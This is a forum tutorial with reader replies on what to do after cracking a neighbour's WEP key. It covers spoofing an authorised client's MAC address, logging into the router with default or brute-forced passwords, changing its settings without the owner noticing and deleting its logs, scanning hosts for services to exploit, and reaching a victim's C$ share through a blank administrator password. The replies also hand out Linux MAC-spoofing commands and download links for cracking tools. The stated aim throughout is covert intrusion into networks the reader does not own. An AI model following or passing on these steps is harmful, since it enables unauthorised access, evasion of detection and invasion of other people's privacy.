TAZ Forum Community

Cracking WEP with Windows XP SP2 - Part Two



Part Two in the Cracking WEP series covers what to do once you have a valid WEP key – I recommend you read Part One (if you have not already) before reading this tutorial if you want to understand how WEP works and how to get the WEP key. It can be found here: http://www.tazforum.thetazzone.com/viewtopic.php?t=2069



So, you have managed to get a valid WEP key, and are wondering what to do next?

Well, first of all, you should try to associate with the Wireless Access Point (WAP or AP). This is made very easy in Windows XP SP2:


When SSID Broadcasting is enabled:
Start > Connect to > Wireless Network Connection > View Available Wireless Networks

You will now be presented with a list of wireless networks that Windows XP has managed to find. If SSID broadcasting is enabled on the AP, the network name will show up, and the application will also let you know if the AP is using WPA encryption or not.

If it shows the network name and then 'Security enabled wireless network' beneath it, there is a 90% chance that it will be using WEP for its security. If it is using WPA, it will say "Security Enabled Network (WPA)".

Now just double click on the network name and it will prompt you to enter the WEP key – enter this twice and see if it lets you connect.

If it does, well done, you have successfully associated with the AP – if it does not, the following are the most likely possible causes of this:

- The AP has MAC Address filtering enabled;
- You are too far away from the AP;
- The WEP key is wrong.

The AP has MAC address filtering enabled
If you followed my previous paper to obtain the WEP key, I mentioned writing down the MAC addresses that had successfully associated with the AP in case MAC address filtering was active.

Now you know why!

Change your MAC address (covered later on) to one that you know was associated and therefore authenticated to that AP. Then, wait until it is not in use - the early hours of the morning are usually good for this - change your MAC Address, and try to associate with the AP. You can try it whilst the rightful owner of the MAC is online, but you will either kick him off or be rejected by the AP.

You are to far away from the AP
- Move closer to it;
- Wait until night time – wireless waves travel further at night, especially if it has been raining (the more humid, the better);
- Get an external and more powerful antenna, or a directional antenna (these are much more powerful than omnidirectional antennae);
- Try another wireless card;
- Sometimes moving rooms in your house can solve the issue – I pick up APs in one room in the front of my house that I don’t in a room at the back of my house;
- Move into the garden – there are no walls or electrical interference in the garden!

The WEP key is wrong
This may sound obvious but I have had students do this in the past... Make sure that the WEP key you have managed to obtain is for the same AP to which you are trying to connect!
Check you are entering it in correctly – it is in HEX so the 0 is a ZERO, not a capital ‘O’ – there is no ‘O’ in HEX – I have seen this before too!


If SSID broadcasting is disabled:
If SSID broadcasting is disabled, and if you have not managed to find it with Airodump, you will have to fire Airodump back up and let it collect data again (use your IVS file and just add data to this) until it finds the SSID – it will find it, given enough data. There are other applications that will do this on various operating systems, but I am using Airodump here.

Once you have the ESSID (the name of the wireless network), you need to tell Windows what AP you would like it to connect to. You do this like so:

Start > Connect to > Wireless Network Connection > View Wireless Networks > Change Advanced settings (on the left) > Wireless Networks (Middle tab on top) > Add (under preferred networks) > Type the SSID exactly as Airodump has displayed it to you into the "SSID" box > Network Authentication is usually OPEN > Select WEP from the Data Encryption > Uncheck ‘The Key is provided for me automatically’ box if it is ticked > Then enter the WEP key into the relevant boxes, without the colons.

If you wish, you can go to the last tab (Connection) and check the box to ‘Automatically connect when network is in range’. This will automatically connect you to this network when Windows picks it up; this setting is usually enabled by default.

The other settings will differ by AP but are usually left unchecked.


Changing your MAC address:
For some people, this can seem a bit daunting and/or a complex task to do. This would have been true a few years ago, but nowadays there are hundreds of applications which can do this for you, and with Windows XP SP2 it can even be done using the inbuilt network configuration tools.

First, let me very briefly explain what a Media Access Control (MAC) address is and why it is so important on a network.

All Network Interface Cards (NICs) have an unique set of numbers and letters encoded into the hardware when they are made in the factory. Theoretically, every single NIC in the world has a different MAC address. It is encoded using the HEX numbering system – that is, the decimal digits (numbers from 0-9) and the letters A-F (the same HEX that a WEP key uses).

It will look something like this: 00:09:5B:84:A6:DF

Each manufacturer has a different OUI (Organisationally Unique Identifier) at the beginning of the MAC address, but that is not important to us here.

When you try to assiciate with an AP your MAC address is included with the header of the frame (data) that you are sending. The AP will check this against a local database to see if you are allowed to associate with the AP or not. If you are not obviously you will not be allowed to associate, so will need to spoof your own MAC address. Be awre that you will cause a duplicate entry in the AP's ARP cache if you try to use the MAC address of a host that is already associated with the AP. It may be wise to wait until a quiet period - usually at night before doing this.

I don’t want to go into too much detail here about this process, but if you do want to learn more about it and how it can be exploited on a network, you can read other papers that I have written here:
http://tazforum.thetazzone.com/viewtopic.php?t=473
http://tazforum.thetazzone.com/viewtopic.php?t=530

To change a MAC address, I like to use AMAC: http://amac.paqtool.com/

You can download a trial version of it from the link above, and the more resourceful of you will be able to find a crack to unlock the full version of it.

The program is very user-friendly, and there is no need for me to explain how to use it. But, if you do have any issue with changing your MAC address with it, post in this thread and someone will try to help you (DO NOT post asking where to get the crack).

To change your MAC address using Windows' inbuilt tools, you must use the Windows Device Manager (this is not possible on ALL wireless adaptors, especially in-built ones). Here are instructions on how to do this:

Control Panel > System > Hardware > Device manager > Network Adaptors > Select your network adaptor > Advanced > MAC Address / Hardware Address/Locally administered address > Change it to the desired value.

**Make sure you write the original one down so you can change it back**

Or you can do it via the registry:

1. Open up a command prompt and type “ipconfig /all”, write down the Description for the NIC you want to change and also the MAC address you want to change.

2. Open up a command prompt and type “net config rdr”

3. Write down the long number between the curly braces { }. This is the GUID of the NIC – you may have more than one; if so, write them all down or copy and paste them into a text file for reference later on.

4. Start -> Run, type “regedt32”. Do not use Regedit.

5. If you so wish you can back your registry up in case you inadvertently mess it up – the registry is vital to how Windows operates, and incorrectly changing a setting could render your computer unusable.
To back it up, either right click on the root of the key we are editing (in this case, it is HKEY_LOCAL_MACHINE) and select Export – call it something appropriate and save it somewhere (like My Documents). Or, if you want to back up the whole registry, right click on My Computer > Export – this will export the entire registry.

6. Go to “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\ {4D36E972-E325-11CE-BFC1-08002BE10318}. Double click on the first one to expand the tree. The sub keys are 4-digit numbers, which represent a whole range of different hardware. You should see most of them start with 0000, then 0001, 0002, 0003 and so on.

7. Go through each sub-key that starts with 0000 and check the DriverDesc keyword on the right until you see the NIC you want to change the MAC address on. The DriveDesc will be the same as what your NIC was called in the Device Manager. If you are not sure about the DriverDesc, you can verify it by checking if the NetCfgInstanceID keyword value matches the GUID from step you wrote down earlier.
If there is no match, then move on to 0001, 0002, 0003, and so on, until you find the one you want. Usually 0000 contains the first NIC you installed on the computer.

8. When you have found and selected the correct sub-key (0000, in my case), check if there is a keyword "NetworkAddress" on the right side of the window.
If the "NetworkAddress" keyword does not exist, we will have to create it, like so:
Click on the drop down menu “Edit -> Add Value”.
In the Add Value window, enter the following value then click OK.
Value Name: = NetworkAddress
Data Type: = REG_SZ
Then the String Editor window will pop up:
Enter the new 12 digit MAC address that we know is allowed to authenticate to the AP > OK.

Close the registry.

To make this MAC address active you need to either disable and then re-enable the NIC or just reboot your system.

So now we have a MAC Address that we know is allowed to associate with the AP, try to re-authenticate.

You should now be able to connect – if not, carry on with the troubleshooting steps mentioned above!

If you’re still unable to authenticate, post in this thread with any error messages and a detailed description of what is going wrong and someone will try to help you out!






I will take it now that you have been able to associate with the AP and are connected OK.

There is no set way to do things from here on, and you can go off and search for a whole range of things you can do to a computer on the same network as you!

But, to get you started, I will give you a few basic ideas and things you can try.


Administratively connect to the AP
Open up a command prompt and type IPCONFIG:

Look under the relevant NIC to find your IP address and your Default Gateway:

The IP Address and Subnet mask tell us what subnet we are on - in the example above, I am on the 192.168.2.0 network and a 255.255.255.0 mask. From this, I can determine that the possible range of IP’s that could be active is 192.168.2.1 – 192.168.2.254.

We already know that 192.168.2.1 is active and what it is – the default gateway. In this case (and probably in yours too), it is also the IP address of the AP!

So we open up our web browser and type 192.168.2.1 into it, which will take us to the admin login page for the AP.
There's a 9/10 chance that the make and model of the AP will be displayed for us here – when we have this, pop along to Google and search for ‘default wireless access point passwords’ which will give you thousands of sites which will list the default passwords for WAP’s (such as this one: http://www.phenoelit.de/dpl/dpl.html). Find the entry for the make and model of the AP and try the login details to see if they work.

If they do not, go and download Brutus and try an HTTP brute force attack against it.

Once we have managed to connect to the AP as an adminstrator, we can see its whole configuration – look for any port forwarding entries to give you an idea of what services may be running behind the AP. You may also be able to see all the DHCP assignments (IP addresses that the AP has given out to hosts). You can also open ports on the AP, should you wish to. Check its logs. Some AP’s will not allow wireless clients to talk to each other, which will mess up any further testing attempts later on, so you should turn that setting off now. Enter your own, correct MAC address into the MAC address table so that you will be able to connect when other hosts are connected next time. Check the range of IP’s to be issued to hosts – if the owner only has two computers he may only have set two IP addresses to be issued, so extend this by one so that you can connect at the same time as the other two hosts.

I would not change the password once you know it, as this will let the owner know that he has been pwned and will just prompt him to hard reset the router and try harder to secure it. If you launch any attacks from the outside, you can also go in and delete the logs here.



Port Scanning
We know the IP range in use by either the output of the ipconfig command or, if we managed to connect to the AP as an adminstrator, we could see the current IP setup, so we can scan the network to see what hosts are active.

I prefer NMAP for this, but any port scanner will do:

To perform a ping sweep with NMAP we use the –sP switch:

The 192.168.2.0/24 tells NMAP to ping all hosts between 192.168.2.0 – 255, the /24 is an abbreviated way of telling it the subnet mask – 255.255.255.0.

This may return something similar to this:

We know what 192.168.2.1 is and now we also know what other hosts are active on the network.

As most of you probably know, you don't connect to an actual 'computer' - you connect to a service that the computer is running. This could be a service that the OS is running, eg, NetBIOS or a Third Party Service eg, VNC.

To talk to other computers, most services use ports.

For the most part, a service will use a pre-defined port (by default).

So, if you scan a computer’s ports, you can find out what services are running.

Once you have a list of used ports and services, then research these services to see what they do - if you find one that interests you, research how to exploit this service, so that you can compromise the computer running it.

This is known as port scanning, and the main reason for doing it is to discover what services are running on each host.

**Be careful not to alert anyone on the network with overenthusiastic port scanning. If a host has a firewall active and a message pops up saying ‘Connection attempt from 192.168.2.x port 139’, the owner may be a bit suspicious if the IP is one that should not be in use. Try to use a passive scan such as the –sS switch in NMAP**



NetBIOS
It is possible to connect to a NetBIOS share that the firewall on the AP may have been protecting – here is an extract from a NetBIOS paper I wrote a few months ago: (Note the IP Addresses will have changed since this was written, and will belong to someone else by now!)

There are many things that you can do now - some will work, most will not. It is all about research to see what your options are.



To reiterate:
- Find the IP range in use;
- Find the default gateway, which will usually be the IP of the AP;
- Try to connect to the AP’s admin page by typing the IP into a web browser;
- Ping sweep the IP range to see what hosts are up;
- Port scan each individual host to see what services are running;
- Research the active services – what they are, how they work, etc;
- Research how to exploit a service that looks "interesting";
- Do NOT make any changes that the AP’s owner will notice, such as changing the password, unnecessarily deleting the AP’s logs, etc.



The intent of this paper was to show you how to authenticate to an AP that has SSID broadcasting either enabled or disabled and how to connect to one that has MAC address filtering enabled, and also to give you a few basic tips and a push in the right direction to show you the kind of things you can do when you have managed to connect.
There are thousands of possible services that can be running on the hosts behind an AP – some with easy to exploit flaws, some with flaws that are harder to exploit and some with no flaws at all – but these services are the key to connecting to ANY computer; if there are no services running, you can’t connect to the host.

You need to read up on any services you find running and see if they can be exploited – I gave you a common example with the NetBIOS service to show you the type of things you are able to do when you have identified a service. Now you need to identify a service or two that interest you and read up on them.

Any questions about this can be posted in this thread. Alternatively, feel free to start a thread of your own (in the relevant forum) to ask your question.

Please DO NOT email or PM me to ask me any questions personally, as I will not reply to them.

Thanks

Nokia

//If you have a web site and would like to link to this or replicate it on your site then you may do so as long as you link back to here with the proper credit. Please do not do as some lame skiddie called Krozo done on what has to be the worst forum I have ever seen here with Part One and not only try to pass it off as their own but also thank ME for helping THEM write it!



...................................................

If you like this tutorial please help others find it by Digging it Here

Great tut, Nokia! Really great job, mate

This should aid many a newbie Hehe!


[edit] So good, in fact, that I've submitted it to Digg: http://digg.com/security/Cracking_WEP_w ... 2_Part_Two

excellent tut again, nokia.

I am a little confused about something, though (actually quite a bit but this is the first thing that popped up)

When you finally connect to this vulnerable IP within your residential subnet, you seem to be using wireless to connect to his open TCP port (correct?). Is this because it is impossible to connect over wired? I suppose it is because only your wireless card is cleared to associate with the AP, but is it possible to add your wired network card's MAC address to the router to make it think you are on the LAN?

Also, since you are connecting to this host using wireless, this guy must physically be pretty close to you? I would think the range of hosts within your residential subnet would tend to mostly be out of wireless range. Perhaps I am not understanding this concept completely...are you connecting to this host by talking to his router, which is in turn relaying you to him? Or are you directly talking to him and bypassing the router completely?

Some router configuration still make a ip range or in the most chaotic of the cases a mac range to accept the clients elsewhere to bypassing the wep key identification.

When you configure your card for join to the router clients in the most chaotic of the cases you need to spoof a connected client mac, duplicating your mac address with the "victim" for test client.

on linux is very easy change the mac:

ifconfig <interface> down
ifconfig <interface> hw <class> <address>
ifconfig up

an example

ifconfig eth0 down
ifconfig eth0 hw ether 7A:5F:04:01:5B:E5
ifconfig eth0 up

for BSD you can use this recommended class http://www.crackenfind.info/sea.c


for windows i recommend read the ironweek tutorial at:

http://www.irongeek.com/i.php?page=security/changemac


if you need perform that on windows using a "mac changer" program you can use my own

http://www.crackenfind.info/mac.rar



greetz

Tried downloading Brutus...but Norton detected it as a "hacktool" and promptly deleted it upon extraction, so I just wanted to verify that this program is actually safe, seeing as none of the other tools I've downloaded thusfar have alerted Norton.

I can't vouch for the actual download as I don't know where you are downloading it but the program itself is safe to use. If you down load it from hoobie you should be OK - it is just a pasword cracker - Norton has a habbit of picking up things like that as unsafe applications - it used to detect Nmap as a virus at one point!

This is a safe place to download it:
http://www.hoobie.net/brutus/brutus-download.html

does Brutus simply try all possible combinations of your user and password lists? In other words if for example the username is something obscure like a1b2c3d4 then it will never work (because this username isn't in the user list)?

Then you need to get a bigger and better user list or try brute forcing. Its not pefect but most old-ish AP's only require a password.

nokia dunno if you saw my earlier post with several questions...and although azrael kinda answers a bit, maybe I'm having trouble understanding his english + he doesnt answer all my questions. Would you mind addressing them?

I am also confused as how to use Brutus to do a brute forced attack...there arent many options and not much documentation on the website.

Ok, Nokia has been filling you with crap

J/k. What you are doing is associating your wireless network card to their vulnerable Access Point. It is vulnerable because it uses WEP, which, as demonstrated, is fairly easy to crack (if you can get enough packets).

Then, when you are associated, you can do all sorts of things. Now that you're on their WLAN (Wireless Local Area Network), you can do an nmap ping sweep of the network (nmap -sP 192.168.1.0/24 - although the first three sets of digits will depend on the network), and from there have a bit of fun... If the NetBIOS ports are open, go enumerating users and such. Oh, and try Start -> Run -> \\IPorHostname\c$ and try using the credentials 'Administrator' with a blank password. If the user is not very computer literate, you'll find yourself with access to his whole C drive

eg. If you see another client on the network with IP 192.168.1.102 and like the look of it, go to run and type:

\\192.168.1.102\c$

Then, when the popup comes up:

Username: Administrator
Password:


If he hasn't set an admin password... Pwnt!

Try the other things Nokia mentioned too.

Well, unless you want to drill through the wall until you find an ethernet cable, yank that out and plug it into your PC - yes, it is impossible

Unless it's your AP, of course... In which case there's no need to crack the WEP key anyway, because you can connect via ethernet, which probably won't have any authentication. Hehe

Nope. You can add your own MAC address to the router's MAC address filtering 'allow' table, but it knows where it's getting the packets from that MAC address from (it knows it's not receiving them via an ethernet port, but wirelessly), so that's why it says that a client is connected wirelessly (or via ethernet - it depends on how the client is connected, of course).

Yes. And the thicker the walls, the closer he must be. In my house, I barely get wireless on the floor below the AP However, with wooden floors (and a bit of concrete, of course), it will pass through much more easily. SOHO wireless waves usually travel around 50-200m in open air... It depends on how powerful your router is

What, when you are connected to the victim's router?

Ok, let me outline the situation.

You are Attacker John. He is Victim Loser.

John cracks the WEP key, and then discovers that MAC address filtering is enabled. He sniffs a client's MAC address, waits till it goes offline, spoofs his MAC address and connects. Then, he tries to connect to the router as Admin - he does this either by finding out its make and model and looking up the default credentials on a defualt password list (most users don't change the default username/password), or by brute forcing the password with an app like Brutus or THC-Hydra. He then add his own MAC address (original, or another spoofed one, if you like, such as ab:cd:ef:12:34:56), so that he can connect when the other dude's connected without making him suspect anything. Then, he starts probing the network. He does this by sending packets to the router, and those then get routed to the destination IP (talking simply). In other words, if John is at 192.168.1.104, and Loser is at 192.168.1.102, and he starts \\192.168.1.102\c$'ing Loser's PC, those packets will first go to the router, which then route (ie. pass on) the packets to 192.168.1.102.

In reality, the router forwards these packets to ALL the PCs connected to it, and the one with the same MAC address as the destination one reads the packets, but let's try to forget that for now to keep it simple!

If you have any more questions, just fire away

Actully thats not strictly true. Im pretty sure theres a way to grab data from nearby cables using magnetic fields or something like that...I dont really remember, but thats why the militry tend to use lead lined buildings and use fibre optics between buildings.



http://www.doc.ic.ac.uk/~nd/surprise_97 ... .html#data

Hmm... Ok. But what are the chances of you being able to tap into that noise if you've got two walls between you and the cables? Or, if you're wardriving, and you're doing this from your car?

Extremely low

heh heh both pretty low without some neat equipment or some seriuos brain power it can be done through walls though (hence the lead lined rooms). Course its nowhere as easy as cracking a wep key I want to get rid of wep here but my brothers nic doesnt support anything else

Haha! Exactly... And are you going to see Mr. Average Cracker with the expensive equipment needed to do that, when there's a vulnerable WEP-encrypted network right there too?

Hehe! Tell him to stop being lazy and buy a new card! A cheap one will cost around £10 - it's not like he's going to lose all his savings on it